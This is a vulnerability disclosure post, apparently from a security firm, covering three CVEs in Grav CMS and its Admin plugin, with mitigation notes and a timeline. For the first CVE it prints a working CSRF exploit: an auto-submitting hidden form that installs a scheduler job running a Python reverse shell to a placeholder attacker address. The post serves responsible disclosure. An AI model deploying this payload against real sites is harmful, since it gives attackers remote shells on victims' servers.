4 mars 2021

[CVE-2020-29553] [CVE-2020-29555] [CVE-2020-29556]: Multiple vulnerabilities within CMS Grav

Introduction

Recently, BSSI performed an intrusion test on the OpenSource Grav CMS. This very popular CMS has received numerous awards and more than 12,500 stars on GitHub.

This article describes three vulnerabilities discovered by the BSSI audit team during this penetration test. They affect CMS Grav in its versions 1.6.28 and 1.7.0-rc.17 as well as the Admin plugin in its version 1.9.17.

The CMS Grav’s administration interface makes it simple to administer and configure a web site:

First vulnerability: Remote Command Execution (RCE) on the Grav CMS (CVE-2020-29553)

The first vulnerability results from an anti-CSRF token control flaw that allows an unauthenticated attacker to force an administrator to execute commands on the system when the ‘Scheduler’ feature is enabled.

The video below describes the vulnerability (proof of concept):

[PoC vidéo]

The exploit to get a reverse-shell is available below:

<form method="POST" name="f" action="http://victim.net/admin/tools/scheduler" 
target="hidden_iframe" style="display: none">
  <input name="task" value="save">
   <input name="data[status][cache-purge]" value="enabled">
   <input name="data[status][cache-clear]" value="enabled">
   <input name="data[status][default-site-backup]" value="enabled">
   <input name="data[custom_jobs][bssi][command]" value="python -c
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((&quot;ATTACKER_IP&quot;,ATTACKER_PORT));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);'">
   <input name="data[custom_jobs][bssi][args]" value="">
   <input name="data[custom_jobs][bssi][at]" value="* * * * *">
   <input name="data[custom_jobs][bssi][output]" value="logs/logs.txt">
   <input name="data[custom_jobs][bssi][output_mode]" value="overwrite">
   <input name="data[custom_jobs][bssi][email]" value="">
   <input type="submit">
</form>
<iframe name="hidden_iframe" style="display:none"></iframe>
<script type="text/javascript">
(function() {document.forms[0].submit()})();
</script>

Second vulnerability: Arbitrary File Deletion (CVE-2020-29555)

The second vulnerability allows an unauthenticated attacker to delete any file present in the CMS directory but also those with write permission by the web server. This vulnerability especially allows an attacker to delete the administrator’s YAML file in order to then create a new administrator and take full control of the CMS.

Indeed, the method taskBackupDelete() located on line n°1374 of the file user/plugins/admin/classes/AdminController.php does not check correctly the path of the file to delete and it is possible to exit the « backup » directory by using a directory traversal technique.

This vulnerability can be exploited through a CSRF attack that will force the administrator to delete a particular file when visiting a malicious site.

The video below describes the vulnerability (proof of concept):

[PoC vidéo]

Third vulnerability: Local File Injection (CVE-2020-29556)

The last vulnerability allows an unauthenticated attacker to recover the content of any file on the CMS Grav underlying server.

Indeed, the taskBackup() method located on line n°1317 of the file user/plugins/admin/classes/AdminController.php does not correctly check the path of the file to be backed up and it is possible to specify an arbitrary file using a directory traversal technique.

This vulnerability can be exploited thanks to a CSRF attack chained to an XSS.

When the CMS administrator visits a malicious site, the CSRF will first inject malicious JavaScript code into a page of the CMS, then make the administrator execute the injected payload.

The video below describes the vulnerability (proof of concept):

[PoC vidéo]

Mitigation

The RCE (CVE-2020-29553) has partially been fixed by taking the CSRF token into account.

The arbitrary file deletion (CVE-2020-29555) has been fixed by removing the strpos verification and checking the basename of the $download variable:

The local file injection (CVE-2020-29556) has been fixed by checking the basename of the $backup variable:

Conclusion

Following the discovery of these vulnerabilities, the BSSI audit team contacted and reported the three vulnerabilities to the CMS Grav development team. A patch was made available on December 4, 2020 (corresponding to Grav 1.6.30 and Admin 1.9.18 versions). This patch fixes all 3 vulnerabilities.

These vulnerabilities are now known as CVE-2020-29553, CVE-2020-29555 and CVE-2020-29556.

Timeline

11/21/2020 – Discovery of vulnerabilities
11/25/2020 – Contact with the Grav team
11/30/2020 – Team relaunch
12/04/2020 – Fixed vulnerabilities with the Grav 1.6.30 and Admin 1.9.18 patches
03/04/2020 – Disclosure of vulnerabilities

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *